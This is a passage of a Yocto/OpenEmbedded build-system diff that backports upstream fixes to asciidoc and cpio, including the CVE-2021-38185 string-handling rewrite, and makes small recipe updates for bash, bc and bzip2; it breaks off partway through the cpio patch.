diff options
Diffstat (limited to 'meta/recipes-extended')
133 files changed, 6898 insertions, 53 deletions
diff --git a/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch new file mode 100644 index 0000000000..14c1cd806e --- /dev/null +++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch | |||
@@ -0,0 +1,42 @@ | |||
1 | From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001 | ||
2 | From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz> | ||
3 | Date: Fri, 30 Oct 2020 15:10:35 +0100 | ||
4 | Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151) | ||
5 | |||
6 | Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f | ||
7 | |||
8 | Slightly modified to cleanly apply to asciidoc 8.6.9: | ||
9 | - VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9 | ||
10 | - line numbers corrected to eliminate offset warnings | ||
11 | |||
12 | Upstream-Status: Backport | ||
13 | Signed-off-by: Steve Sakoman <steve@sakoman.com> | ||
14 | |||
15 | --- | ||
16 | asciidoc.py | 6 +++--- | ||
17 | 1 file changed, 3 insertions(+), 3 deletions(-) | ||
18 | |||
19 | diff --git a/asciidoc.py b/asciidoc.py | ||
20 | index f960e7d8..42868c4b 100755 | ||
21 | --- a/asciidoc.py | ||
22 | +++ b/asciidoc.py | ||
23 | @@ -30,7 +30,7 @@ | ||
24 | # Used by asciidocapi.py # | ||
25 | VERSION = '8.6.10' # See CHANGELOG file for version history. | ||
26 | |||
27 | -MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better. | ||
28 | +MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better. | ||
29 | |||
30 | # --------------------------------------------------------------------------- | ||
31 | # Program constants. | ||
32 | @@ -4704,8 +4704,8 @@ def init(self, cmd): | ||
33 | directory. | ||
34 | cmd is the asciidoc command or asciidoc.py path. | ||
35 | """ | ||
36 | - if float(sys.version[:3]) < float(MIN_PYTHON_VERSION): | ||
37 | - message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION) | ||
38 | + if sys.version_info[:2] < MIN_PYTHON_VERSION: | ||
39 | + message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION) | ||
40 | sys.exit(1) | ||
41 | if not os.path.exists(cmd): | ||
42 | message.stderr('FAILED: Missing asciidoc command: %s' % cmd) | ||
diff --git a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb index 751bf0f19f..325ff9aa15 100644 --- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb +++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb | |||
@@ -8,8 +8,9 @@ LICENSE = "GPLv2" | |||
8 | LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \ | 8 | LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \ |
9 | file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069" | 9 | file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069" |
10 | 10 | ||
11 | SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \ | 11 | SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \ |
12 | file://auto-catalogs.patch" | 12 | file://auto-catalogs.patch \ |
13 | file://detect-python-version.patch" | ||
13 | SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0" | 14 | SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0" |
14 | PV .= "+py3-git${SRCPV}" | 15 | PV .= "+py3-git${SRCPV}" |
15 | 16 | ||
diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc index 1ebb33bdcd..4e6176d2e6 100644 --- a/meta/recipes-extended/bash/bash.inc +++ b/meta/recipes-extended/bash/bash.inc | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "An sh-compatible command language interpreter" | 1 | SUMMARY = "An sh-compatible command language interpreter" |
2 | HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html" | 2 | HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html" |
3 | DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features." | ||
3 | SECTION = "base/shell" | 4 | SECTION = "base/shell" |
4 | 5 | ||
5 | DEPENDS = "ncurses bison-native virtual/libiconv" | 6 | DEPENDS = "ncurses bison-native virtual/libiconv" |
@@ -48,6 +49,11 @@ do_compile_ptest () { | |||
48 | oe_runmake buildtest | 49 | oe_runmake buildtest |
49 | } | 50 | } |
50 | 51 | ||
52 | do_install_prepend () { | ||
53 | # Ensure determinism as this counter increases for each make call | ||
54 | rm -f ${B}/.build | ||
55 | } | ||
56 | |||
51 | do_install_append () { | 57 | do_install_append () { |
52 | # Move /usr/bin/bash to /bin/bash, if need | 58 | # Move /usr/bin/bash to /bin/bash, if need |
53 | if [ "${base_bindir}" != "${bindir}" ]; then | 59 | if [ "${base_bindir}" != "${bindir}" ]; then |
diff --git a/meta/recipes-extended/bc/bc_1.07.1.bb b/meta/recipes-extended/bc/bc_1.07.1.bb index 4a51302492..8ed10d14c2 100644 --- a/meta/recipes-extended/bc/bc_1.07.1.bb +++ b/meta/recipes-extended/bc/bc_1.07.1.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Arbitrary precision calculator language" | 1 | SUMMARY = "Arbitrary precision calculator language" |
2 | HOMEPAGE = "http://www.gnu.org/software/bc/bc.html" | 2 | HOMEPAGE = "http://www.gnu.org/software/bc/bc.html" |
3 | DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements." | ||
3 | 4 | ||
4 | LICENSE = "GPLv3+" | 5 | LICENSE = "GPLv3+" |
5 | LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \ | 6 | LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \ |
@@ -31,4 +32,4 @@ do_compile_prepend() { | |||
31 | ALTERNATIVE_${PN} = "bc dc" | 32 | ALTERNATIVE_${PN} = "bc dc" |
32 | ALTERNATIVE_PRIORITY = "100" | 33 | ALTERNATIVE_PRIORITY = "100" |
33 | 34 | ||
34 | BBCLASSEXTEND = "native" | 35 | BBCLASSEXTEND = "native nativesdk" |
diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am index dcf64584d9..adc85a62b2 100644 --- a/meta/recipes-extended/bzip2/bzip2/Makefile.am +++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am | |||
@@ -1,6 +1,6 @@ | |||
1 | 1 | ||
2 | lib_LTLIBRARIES = libbz2.la | 2 | lib_LTLIBRARIES = libbz2.la |
3 | libbz2_la_LDFLAGS = -version-info 1:6:0 | 3 | libbz2_la_LDFLAGS = -version-info 1:8:0 |
4 | 4 | ||
5 | libbz2_la_SOURCES = blocksort.c \ | 5 | libbz2_la_SOURCES = blocksort.c \ |
6 | huffman.c \ | 6 | huffman.c \ |
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch new file mode 100644 index 0000000000..2dfd348d7c --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch | |||
@@ -0,0 +1,58 @@ | |||
1 | From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001 | ||
2 | From: Sergey Poznyakoff <gray@gnu.org> | ||
3 | Date: Fri, 7 Apr 2023 11:23:37 +0300 | ||
4 | Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode. | ||
5 | |||
6 | * src/copyout.c (read_for_checksum): Fix type of the file_size argument. | ||
7 | Rewrite the reading loop. | ||
8 | |||
9 | Original patch by Stefano Babic <sbabic@denx.de> | ||
10 | |||
11 | Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d] | ||
12 | Signed-off-by: Marek Vasut <marex@denx.de> | ||
13 | --- | ||
14 | src/copyout.c | 16 +++++++--------- | ||
15 | 1 file changed, 7 insertions(+), 9 deletions(-) | ||
16 | |||
17 | diff --git a/src/copyout.c b/src/copyout.c | ||
18 | index 8b0beb6..f1ff351 100644 | ||
19 | --- a/src/copyout.c | ||
20 | +++ b/src/copyout.c | ||
21 | @@ -34,27 +34,25 @@ | ||
22 | compute and return a checksum for them. */ | ||
23 | |||
24 | static uint32_t | ||
25 | -read_for_checksum (int in_file_des, int file_size, char *file_name) | ||
26 | +read_for_checksum (int in_file_des, off_t file_size, char *file_name) | ||
27 | { | ||
28 | uint32_t crc; | ||
29 | - char buf[BUFSIZ]; | ||
30 | - int bytes_left; | ||
31 | - int bytes_read; | ||
32 | - int i; | ||
33 | + unsigned char buf[BUFSIZ]; | ||
34 | + ssize_t bytes_read; | ||
35 | + ssize_t i; | ||
36 | |||
37 | crc = 0; | ||
38 | |||
39 | - for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read) | ||
40 | + while (file_size > 0) | ||
41 | { | ||
42 | bytes_read = read (in_file_des, buf, BUFSIZ); | ||
43 | if (bytes_read < 0) | ||
44 | error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name); | ||
45 | if (bytes_read == 0) | ||
46 | break; | ||
47 | - if (bytes_left < bytes_read) | ||
48 | - bytes_read = bytes_left; | ||
49 | - for (i = 0; i < bytes_read; ++i) | ||
50 | + for (i = 0; i < bytes_read; i++) | ||
51 | crc += buf[i] & 0xff; | ||
52 | + file_size -= bytes_read; | ||
53 | } | ||
54 | if (lseek (in_file_des, 0L, SEEK_SET)) | ||
55 | error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name); | ||
56 | -- | ||
57 | 2.39.2 | ||
58 | |||
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch new file mode 100644 index 0000000000..c212bddf7d --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch | |||
@@ -0,0 +1,312 @@ | |||
1 | From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001 | ||
2 | From: Sergey Poznyakoff <gray@gnu.org> | ||
3 | Date: Fri, 28 Apr 2023 15:23:46 +0300 | ||
4 | Subject: [PATCH 4/4] Fix appending to archives bigger than 2G | ||
5 | |||
6 | * src/extern.h (last_header_start): Change type to off_t. | ||
7 | * src/global.c: Likewise. | ||
8 | * src/util.c (prepare_append): Use off_t for file offsets. | ||
9 | |||
10 | Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a] | ||
11 | Signed-off-by: Marek Vasut <marex@denx.de> | ||
12 | --- | ||
13 | src/extern.h | 11 ++++----- | ||
14 | src/global.c | 2 +- | ||
15 | src/util.c | 66 ++++++++++++++++++++++++++-------------------------- | ||
16 | 3 files changed, 39 insertions(+), 40 deletions(-) | ||
17 | |||
18 | diff --git a/src/extern.h b/src/extern.h | ||
19 | index 11ac6bf..12f14a9 100644 | ||
20 | --- a/src/extern.h | ||
21 | +++ b/src/extern.h | ||
22 | @@ -67,7 +67,7 @@ extern int ignore_devno_option; | ||
23 | |||
24 | extern bool to_stdout_option; | ||
25 | |||
26 | -extern int last_header_start; | ||
27 | +extern off_t last_header_start; | ||
28 | extern int copy_matching_files; | ||
29 | extern int numeric_uid; | ||
30 | extern char *pattern_file_name; | ||
31 | @@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname, | ||
32 | |||
33 | /* copypass.c */ | ||
34 | void process_copy_pass (void); | ||
35 | -int link_to_maj_min_ino (char *file_name, int st_dev_maj, | ||
36 | +int link_to_maj_min_ino (char *file_name, int st_dev_maj, | ||
37 | int st_dev_min, ino_t st_ino); | ||
38 | int link_to_name (char const *link_name, char const *link_target); | ||
39 | |||
40 | @@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes); | ||
41 | void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename); | ||
42 | void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename); | ||
43 | void warn_if_file_changed (char *file_name, off_t old_file_size, | ||
44 | - time_t old_file_mtime); | ||
45 | + time_t old_file_mtime); | ||
46 | void create_all_directories (char const *name); | ||
47 | void prepare_append (int out_file_des); | ||
48 | char *find_inode_file (ino_t node_num, | ||
49 | @@ -185,7 +185,7 @@ void set_new_media_message (char *message); | ||
50 | #ifdef HPUX_CDF | ||
51 | char *add_cdf_double_slashes (char *filename); | ||
52 | #endif | ||
53 | -void write_nuls_to_file (off_t num_bytes, int out_des, | ||
54 | +void write_nuls_to_file (off_t num_bytes, int out_des, | ||
55 | void (*writer) (char *in_buf, | ||
56 | int out_des, off_t num_bytes)); | ||
57 | #define DISK_IO_BLOCK_SIZE 512 | ||
58 | @@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st, | ||
59 | mode_t invert_permissions); | ||
60 | int repair_delayed_set_stat (struct cpio_file_stat *file_hdr); | ||
61 | void apply_delayed_set_stat (void); | ||
62 | - | ||
63 | -int arf_stores_inode_p (enum archive_format arf); | ||
64 | |||
65 | +int arf_stores_inode_p (enum archive_format arf); | ||
66 | diff --git a/src/global.c b/src/global.c | ||
67 | index fb3abe9..5c9fc05 100644 | ||
68 | --- a/src/global.c | ||
69 | +++ b/src/global.c | ||
70 | @@ -114,7 +114,7 @@ int debug_flag = false; | ||
71 | |||
72 | /* File position of last header read. Only used during -A to determine | ||
73 | where the old TRAILER!!! record started. */ | ||
74 | -int last_header_start = 0; | ||
75 | +off_t last_header_start = 0; | ||
76 | |||
77 | /* With -i; if true, copy only files that match any of the given patterns; | ||
78 | if false, copy only files that do not match any of the patterns. (-f) */ | ||
79 | diff --git a/src/util.c b/src/util.c | ||
80 | index 4421b20..3be89a4 100644 | ||
81 | --- a/src/util.c | ||
82 | +++ b/src/util.c | ||
83 | @@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des) | ||
84 | static long output_bytes_before_lseek = 0; | ||
85 | |||
86 | /* Some tape drivers seem to have a signed internal seek pointer and | ||
87 | - they lose if it overflows and becomes negative (e.g. when writing | ||
88 | - tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the | ||
89 | + they lose if it overflows and becomes negative (e.g. when writing | ||
90 | + tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the | ||
91 | seek pointer and prevent it from overflowing. */ | ||
92 | if (output_is_special | ||
93 | && ( (output_bytes_before_lseek += output_size) >= 1073741824L) ) | ||
94 | @@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush); | ||
95 | descriptor OUT_DES and reset `output_size' and `out_buff'. | ||
96 | If `swapping_halfwords' or `swapping_bytes' is set, | ||
97 | do the appropriate swapping first. Our callers have | ||
98 | - to make sure to only set these flags if `output_size' | ||
99 | + to make sure to only set these flags if `output_size' | ||
100 | is appropriate (a multiple of 4 for `swapping_halfwords', | ||
101 | 2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE | ||
102 | must always be a multiple of 4 helps us (and our callers) | ||
103 | @@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes) | ||
104 | { | ||
105 | #ifdef BROKEN_LONG_TAPE_DRIVER | ||
106 | /* Some tape drivers seem to have a signed internal seek pointer and | ||
107 | - they lose if it overflows and becomes negative (e.g. when writing | ||
108 | - tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the | ||
109 | + they lose if it overflows and becomes negative (e.g. when writing | ||
110 | + tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the | ||
111 | seek pointer and prevent it from overflowing. */ | ||
112 | if (input_is_special | ||
113 | && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) ) | ||
114 | @@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes) | ||
115 | |||
116 | #ifdef BROKEN_LONG_TAPE_DRIVER | ||
117 | /* Some tape drivers seem to have a signed internal seek pointer and | ||
118 | - they lose if it overflows and becomes negative (e.g. when writing | ||
119 | - tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the | ||
120 | + they lose if it overflows and becomes negative (e.g. when writing | ||
121 | + tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the | ||
122 | seek pointer and prevent it from overflowing. */ | ||
123 | if (input_is_special | ||
124 | && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) ) | ||
125 | @@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes) | ||
126 | |||
127 | if (crc_i_flag && only_verify_crc_flag) | ||
128 | { | ||
129 | - int k; | ||
130 | + int k; | ||
131 | for (k = 0; k < space_left; ++k) | ||
132 | crc += in_buff[k] & 0xff; | ||
133 | } | ||
134 | @@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes) | ||
135 | } | ||
136 | |||
137 | void | ||
138 | -write_nuls_to_file (off_t num_bytes, int out_des, | ||
139 | - void (*writer) (char *in_buf, int out_des, off_t num_bytes)) | ||
140 | +write_nuls_to_file (off_t num_bytes, int out_des, | ||
141 | + void (*writer) (char *in_buf, int out_des, off_t num_bytes)) | ||
142 | { | ||
143 | off_t blocks; | ||
144 | off_t extra_bytes; | ||
145 | off_t i; | ||
146 | static char zeros_512[512]; | ||
147 | - | ||
148 | + | ||
149 | blocks = num_bytes / sizeof zeros_512; | ||
150 | extra_bytes = num_bytes % sizeof zeros_512; | ||
151 | for (i = 0; i < blocks; ++i) | ||
152 | @@ -603,7 +603,7 @@ create_all_directories (char const *name) | ||
153 | char *dir; | ||
154 | |||
155 | dir = dir_name (name); | ||
156 | - | ||
157 | + | ||
158 | if (dir == NULL) | ||
159 | error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted")); | ||
160 | |||
161 | @@ -637,9 +637,9 @@ create_all_directories (char const *name) | ||
162 | void | ||
163 | prepare_append (int out_file_des) | ||
164 | { | ||
165 | - int start_of_header; | ||
166 | - int start_of_block; | ||
167 | - int useful_bytes_in_block; | ||
168 | + off_t start_of_header; | ||
169 | + off_t start_of_block; | ||
170 | + size_t useful_bytes_in_block; | ||
171 | char *tmp_buf; | ||
172 | |||
173 | start_of_header = last_header_start; | ||
174 | @@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2) | ||
175 | const struct inode_val *ival1 = val1; | ||
176 | const struct inode_val *ival2 = val2; | ||
177 | return ival1->inode == ival2->inode | ||
178 | - && ival1->major_num == ival2->major_num | ||
179 | - && ival1->minor_num == ival2->minor_num; | ||
180 | + && ival1->major_num == ival2->major_num | ||
181 | + && ival1->minor_num == ival2->minor_num; | ||
182 | } | ||
183 | |||
184 | static struct inode_val * | ||
185 | @@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num, | ||
186 | unsigned long minor_num) | ||
187 | { | ||
188 | struct inode_val sample; | ||
189 | - | ||
190 | + | ||
191 | if (!hash_table) | ||
192 | return NULL; | ||
193 | - | ||
194 | + | ||
195 | sample.inode = node_num; | ||
196 | sample.major_num = major_num; | ||
197 | sample.minor_num = minor_num; | ||
198 | @@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num, | ||
199 | { | ||
200 | struct inode_val *temp; | ||
201 | struct inode_val *e = NULL; | ||
202 | - | ||
203 | + | ||
204 | /* Create new inode record. */ | ||
205 | temp = (struct inode_val *) xmalloc (sizeof (struct inode_val)); | ||
206 | temp->inode = node_num; | ||
207 | @@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize) | ||
208 | |||
209 | /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to | ||
210 | create holes instead of writing blockfuls of zeros. | ||
211 | - | ||
212 | + | ||
213 | Return the number of bytes written (including bytes in zero | ||
214 | regions) on success, -1 on error. | ||
215 | |||
216 | @@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush) | ||
217 | |||
218 | enum { begin, in_zeros, not_in_zeros } state = | ||
219 | delayed_seek_count ? in_zeros : begin; | ||
220 | - | ||
221 | + | ||
222 | while (nbytes) | ||
223 | { | ||
224 | size_t rest = nbytes; | ||
225 | @@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush) | ||
226 | if (state == not_in_zeros) | ||
227 | { | ||
228 | ssize_t bytes = buf - start_ptr + rest; | ||
229 | - | ||
230 | + | ||
231 | n = write (fildes, start_ptr, bytes); | ||
232 | if (n == -1) | ||
233 | return -1; | ||
234 | @@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush) | ||
235 | if (n != 1) | ||
236 | return n; | ||
237 | delayed_seek_count = 0; | ||
238 | - } | ||
239 | - | ||
240 | + } | ||
241 | + | ||
242 | return nwritten + seek_count; | ||
243 | } | ||
244 | |||
245 | @@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header) | ||
246 | if (!no_chown_flag) | ||
247 | { | ||
248 | uid_t uid = CPIO_UID (header->c_uid); | ||
249 | - gid_t gid = CPIO_GID (header->c_gid); | ||
250 | + gid_t gid = CPIO_GID (header->c_gid); | ||
251 | if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0) | ||
252 | && errno != EPERM) | ||
253 | chown_error_details (header->c_name, uid, gid); | ||
254 | @@ -1239,13 +1239,13 @@ set_file_times (int fd, | ||
255 | const char *name, unsigned long atime, unsigned long mtime) | ||
256 | { | ||
257 | struct timespec ts[2]; | ||
258 | - | ||
259 | + | ||
260 | memset (&ts, 0, sizeof ts); | ||
261 | |||
262 | ts[0].tv_sec = atime; | ||
263 | ts[1].tv_sec = mtime; | ||
264 | |||
265 | - /* Silently ignore EROFS because reading the file won't have upset its | ||
266 | + /* Silently ignore EROFS because reading the file won't have upset its | ||
267 | timestamp if it's on a read-only filesystem. */ | ||
268 | if (fdutimens (fd, name, ts) < 0 && errno != EROFS) | ||
269 | utime_error (name); | ||
270 | @@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names, | ||
271 | |||
272 | /* This is a simplified form of delayed set_stat used by GNU tar. | ||
273 | With the time, both forms will merge and pass to paxutils | ||
274 | - | ||
275 | + | ||
276 | List of directories whose statuses we need to extract after we've | ||
277 | finished extracting their subsidiary files. If you consider each | ||
278 | contiguous subsequence of elements of the form [D]?[^D]*, where [D] | ||
279 | @@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed) | ||
280 | { | ||
281 | int rc; | ||
282 | mode_t mode = file_hdr->c_mode; | ||
283 | - | ||
284 | + | ||
285 | if (!(file_hdr->c_mode & S_IWUSR)) | ||
286 | { | ||
287 | rc = mkdir (file_hdr->c_name, mode | S_IWUSR); | ||
288 | @@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir) | ||
289 | { | ||
290 | int res; /* Result of various function calls. */ | ||
291 | int setstat_delayed = 0; | ||
292 | - | ||
293 | + | ||
294 | if (to_stdout_option) | ||
295 | return 0; | ||
296 | - | ||
297 | + | ||
298 | /* Strip any trailing `/'s off the filename; tar puts | ||
299 | them on. We might as well do it here in case anybody | ||
300 | else does too, since they cause strange things to happen. */ | ||
301 | @@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf) | ||
302 | } | ||
303 | return 1; | ||
304 | } | ||
305 | - | ||
306 | + | ||
307 | void | ||
308 | cpio_file_stat_init (struct cpio_file_stat *file_hdr) | ||
309 | { | ||
310 | -- | ||
311 | 2.39.2 | ||
312 | |||
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch | |||
@@ -0,0 +1,581 @@ | |||
1 | GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted | ||
2 | pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers | ||
3 | an out-of-bounds heap write. | ||
4 | |||
5 | CVE: CVE-2021-38185 | ||
6 | Upstream-Status: Backport | ||
7 | Signed-off-by: Ross Burton <ross.burton@arm.com> | ||
8 | |||
9 | From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 | ||
10 | From: Sergey Poznyakoff <gray@gnu.org> | ||
11 | Date: Sat, 7 Aug 2021 12:52:21 +0300 | ||
12 | Subject: [PATCH 1/3] Rewrite dynamic string support. | ||
13 | |||
14 | * src/dstring.c (ds_init): Take a single argument. | ||
15 | (ds_free): New function. | ||
16 | (ds_resize): Take a single argument. Use x2nrealloc to expand | ||
17 | the storage. | ||
18 | (ds_reset,ds_append,ds_concat,ds_endswith): New function. | ||
19 | (ds_fgetstr): Rewrite. In particular, this fixes integer overflow. | ||
20 | * src/dstring.h (dynamic_string): Keep both the allocated length | ||
21 | (ds_size) and index of the next free byte in the string (ds_idx). | ||
22 | (ds_init,ds_resize): Change signature. | ||
23 | (ds_len): New macro. | ||
24 | (ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. | ||
25 | * src/copyin.c: Use new ds_ functions. | ||
26 | * src/copyout.c: Likewise. | ||
27 | * src/copypass.c: Likewise. | ||
28 | * src/util.c: Likewise. | ||
29 | --- | ||
30 | src/copyin.c | 40 +++++++++++------------ | ||
31 | src/copyout.c | 16 ++++----- | ||
32 | src/copypass.c | 34 +++++++++---------- | ||
33 | src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- | ||
34 | src/dstring.h | 31 +++++++++--------- | ||
35 | src/util.c | 6 ++-- | ||
36 | 6 files changed, 123 insertions(+), 92 deletions(-) | ||
37 | |||
38 | diff --git a/src/copyin.c b/src/copyin.c | ||
39 | index b29f348..37e503a 100644 | ||
40 | --- a/src/copyin.c | ||
41 | +++ b/src/copyin.c | ||
42 | @@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, | ||
43 | char *str_res; /* Result for string function. */ | ||
44 | static dynamic_string new_name; /* New file name for rename option. */ | ||
45 | static int initialized_new_name = false; | ||
46 | + | ||
47 | if (!initialized_new_name) | ||
48 | - { | ||
49 | - ds_init (&new_name, 128); | ||
50 | - initialized_new_name = true; | ||
51 | - } | ||
52 | + { | ||
53 | + ds_init (&new_name); | ||
54 | + initialized_new_name = true; | ||
55 | + } | ||
56 | |||
57 | if (rename_flag) | ||
58 | { | ||
59 | @@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) | ||
60 | already in `save_patterns' (from the command line) are preserved. */ | ||
61 | |||
62 | static void | ||
63 | -read_pattern_file () | ||
64 | +read_pattern_file (void) | ||
65 | { | ||
66 | - int max_new_patterns; | ||
67 | - char **new_save_patterns; | ||
68 | - int new_num_patterns; | ||
69 | + char **new_save_patterns = NULL; | ||
70 | + size_t max_new_patterns; | ||
71 | + size_t new_num_patterns; | ||
72 | int i; | ||
73 | - dynamic_string pattern_name; | ||
74 | + dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; | ||
75 | FILE *pattern_fp; | ||
76 | |||
77 | if (num_patterns < 0) | ||
78 | num_patterns = 0; | ||
79 | - max_new_patterns = 1 + num_patterns; | ||
80 | - new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); | ||
81 | new_num_patterns = num_patterns; | ||
82 | - ds_init (&pattern_name, 128); | ||
83 | + max_new_patterns = num_patterns; | ||
84 | + new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); | ||
85 | |||
86 | pattern_fp = fopen (pattern_file_name, "r"); | ||
87 | if (pattern_fp == NULL) | ||
88 | open_fatal (pattern_file_name); | ||
89 | while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) | ||
90 | { | ||
91 | - if (new_num_patterns >= max_new_patterns) | ||
92 | - { | ||
93 | - max_new_patterns += 1; | ||
94 | - new_save_patterns = (char **) | ||
95 | - xrealloc ((char *) new_save_patterns, | ||
96 | - max_new_patterns * sizeof (char *)); | ||
97 | - } | ||
98 | + if (new_num_patterns == max_new_patterns) | ||
99 | + new_save_patterns = x2nrealloc (new_save_patterns, | ||
100 | + &max_new_patterns, | ||
101 | + sizeof (new_save_patterns[0])); | ||
102 | new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); | ||
103 | ++new_num_patterns; | ||
104 | } | ||
105 | + | ||
106 | + ds_free (&pattern_name); | ||
107 | + | ||
108 | if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) | ||
109 | close_error (pattern_file_name); | ||
110 | |||
111 | @@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) | ||
112 | in the file system. */ | ||
113 | |||
114 | void | ||
